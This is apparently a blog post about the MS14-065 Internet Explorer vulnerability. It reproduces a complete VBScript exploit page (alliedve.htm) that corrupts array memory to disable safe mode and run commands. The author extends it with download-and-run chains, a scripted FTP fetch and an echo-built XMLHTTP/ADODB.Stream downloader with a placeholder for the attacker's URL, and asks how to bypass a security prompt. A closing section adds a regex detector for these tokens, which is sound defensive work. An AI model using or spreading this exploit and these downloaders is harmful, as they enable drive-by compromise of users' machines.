MS14-065 covers a series of Internet Explorer vulnerabilities, the most severe of which allows remote code execution when a user views a specially crafted web page. An attacker who successfully exploits these vulnerabilities could gain the same user rights as the current user.
Affected systems: Windows Server 2003 (SP2), Vista 32/64 (SP2), Win7 32/64 (SP1), Win8 32/64, Win8.1 32/64
Microsoft has already pushed an official patch.
alliedve.htm
//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 *//
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
    On Error Resume Next
    set shell=createobject("Shell.Application")
    shell.ShellExecute "notepad.exe"
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()

function Begin()
    On Error Resume Next
    info=Navigator.UserAgent
    if(instr(info,"Win64")>0) then
        exit function
    end if
    if (instr(info,"MSIE")>0) then
        intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
    else
        exit function
    end if
    win9x=0
    BeginInit()
    If Create()=True Then
        myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
        myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
        if(intVersion<4) then
            document.write("<br> IE")
            document.write(intVersion)
            runshellcode()
        else
            setnotsafemode()
        end if
    end if
end function

function BeginInit()
    Randomize()
    redim aa(5)
    redim ab(5)
    a0=13+17*rnd(6)
    a3=7+3*rnd(5)
end function

function Create()
    On Error Resume Next
    dim i
    Create=False
    For i = 0 To 400
        If Over()=True Then
            ' document.write(i)
            Create=True
            Exit For
        End If
    Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
    i=testaa
    i=null
    redim Preserve aa(a2)
    ab(0)=0
    aa(a1)=i
    ab(0)=6.36598737437801E-314
    aa(a1+2)=myarray
    ab(2)=1.74088534731324E-310
    mydata=aa(a1)
    redim Preserve aa(a0)
end function

function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
            j=0
            redim Preserve aa(a2)
            aa(a1+2)(i+&h11c+k)=ab(4)
            redim Preserve aa(a0)
            j=0
            j=readmemo(i+&h120+k)
            Exit for
        end if
    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
    redim Preserve aa(a0)
    redim ab(a0)
    redim Preserve aa(a2)
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
    If(IsObject(aa(a1-1)) = False) Then
        if(intVersion<4) then
            mem=cint(a0+1)*16
            j=vartype(aa(a1-1))
            if((j=mem+4) or (j*8=mem+8)) then
                if(vartype(aa(a1-1))<>0) Then
                    If(IsObject(aa(a1)) = False ) Then
                        type1=VarType(aa(a1))
                    end if
                end if
            else
                redim Preserve aa(a0)
                exit function
            end if
        else
            if(vartype(aa(a1-1))<>0) Then
                If(IsObject(aa(a1)) = False ) Then
                    type1=VarType(aa(a1))
                end if
            end if
        end if
    end if
    If(type1=&h2f66) Then
        Over=True
    End If
    If(type1=&hB9AD) Then
        Over=True
        win9x=1
    End If
    redim Preserve aa(a0)
end function

function ReadMemo(add)
    On Error Resume Next
    redim Preserve aa(a2)
    ab(0)=0
    aa(a1)=add+4
    ab(0)=1.69759663316747E-313
    ReadMemo=lenb(aa(a1))
    ab(0)=0
    redim Preserve aa(a0)
end function
</script>
</body>
</html>
Since it can run cmd, it can certainly download and run something. After looking into it, I wrote the following code:
shell.ShellExecute "cmd.exe" , "/c @echo off & set ftpfilename=autoftp.cfg & echo open 127.0.0.1 >'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo bin >>'%ftpfilename%' & echo lcd d:\ >>'%ftpfilename%' & echo get calc.exe >>'%ftpfilename%' & echo bye >>'%ftpfilename%' & ftp -s:'%ftpfilename%' & del '%ftpfilename%' & start d:\calc.exe"
@echo off
set ftpfilename=autoftp.cfg
echo open 127.0.0.1 >"%ftpfilename%"
echo 123 >>"%ftpfilename%"
echo 123 >>"%ftpfilename%"
echo bin >>"%ftpfilename%"
echo lcd d:\ >>"%ftpfilename%"
echo get calc.exe >>"%ftpfilename%"
echo bye >>"%ftpfilename%"
ftp -s:"%ftpfilename%"
del "%ftpfilename%"
start d:\calc.exe
The problem is that on 2003, opening it prompts whether to allow active content to run on this computer.
Can that be bypassed?
Besides downloading over FTP, you can also download over HTTP:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >d:\webdown.vbs
echo xPost.Open "GET",http://,0 >>d:\webdown.vbs
Note: replace http:// with your own download URL
echo xPost.Send() >>d:\webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>d:\webdown.vbs
echo sGet.Mode = 3 >>d:\webdown.vbs
echo sGet.Type = 1 >>d:\webdown.vbs
echo sGet.Open() >>d:\webdown.vbs
echo sGet.Write(xPost.responseBody) >>d:\webdown.vbs
echo sGet.SaveToFile "d:\web1\asp\1.aspx",2 >>d:\webdown.vbs
Note: replace d:\web1\asp\1.aspx with your own download location
cscript d:\webdown.vbs
del d:\webdown.vbs
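For anyone on the defending side, the tokens in the alliedve.htm page and the two download chains above (scripted ftp, and echo-built VBScript run with cscript) are easy to match against proxied web content and endpoint process command lines. The following is an added example written for this post, not code from the original post or from yuange; the signature names, the scoring threshold and the sample inputs are constructed for the demonstration.

```python
"""Heuristic detector for the MS14-065 exploit page and the download-and-run
command chains discussed above. Added example, not from the original post;
every signature is a token taken from the posted code, samples are constructed."""
import re

# Tokens from the posted alliedve.htm. A benign page may hit one of these;
# several together is what makes a page worth flagging.
PAGE_SIGNATURES = {
    "emulate_ie8": re.compile(r'content="IE=EmulateIE8"', re.I),
    "vbscript_block": re.compile(r'<script\s+language="vbscript"', re.I),
    "redim_preserve": re.compile(r'\bredim\s+preserve\b', re.I),
    "magic_double": re.compile(
        r'6\.36598737437801E-314|1\.74088534731324E-310|1\.69759663316747E-313', re.I),
    "vartype_0x2f66": re.compile(r'&h2f66\b', re.I),
    "shell_application": re.compile(r'createobject\("Shell\.Application"\)', re.I),
}

# Process command-line patterns for the FTP and HTTP download chains in the post.
CMDLINE_SIGNATURES = {
    "ftp_scripted": re.compile(r'\bftp(\.exe)?\s+-s:', re.I),
    "echo_to_vbs": re.compile(r'\becho\b.*>>?\s*\S+\.vbs\b', re.I),
    "xmlhttp_stream": re.compile(r'Microsoft\.XMLHTTP|ADODB\.Stream', re.I),
    "cscript_vbs": re.compile(r'\bcscript(\.exe)?\s+\S+\.vbs\b', re.I),
}

def score_page(html: str, threshold: int = 3):
    """Return (matched signature names, flagged) for one HTML document."""
    hits = [name for name, rx in PAGE_SIGNATURES.items() if rx.search(html)]
    return hits, len(hits) >= threshold

def score_cmdline(cmdline: str):
    """Return the downloader-chain signatures matched by one process command line."""
    return [name for name, rx in CMDLINE_SIGNATURES.items() if rx.search(cmdline)]

# Constructed samples: a fragment carrying a few exploit tokens, a benign page,
# and command lines shaped like the ones in the post.
SUSPECT_PAGE = ('<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">'
                '<script language="VBScript">redim Preserve aa(a2)'
                ' ab(0)=6.36598737437801E-314</script>')
BENIGN_PAGE = '<html><body><script type="text/javascript">var x=1;</script></body></html>'
SAMPLE_CMDLINES = [
    'cmd.exe /c ftp -s:autoftp.cfg',
    r'echo Set xPost = CreateObject("Microsoft.XMLHTTP") >d:\webdown.vbs',
    r'cscript d:\webdown.vbs',
]

if __name__ == "__main__":
    print("page:", score_page(SUSPECT_PAGE), score_page(BENIGN_PAGE))
    for line in SAMPLE_CMDLINES:
        print(line, "->", score_cmdline(line))
```

The page threshold of three hits is a starting point: the EmulateIE8 meta tag or a VBScript block alone is common on legacy intranet sites, while the magic double constants and the &h2f66 VarType check are specific enough to warrant a closer look on their own.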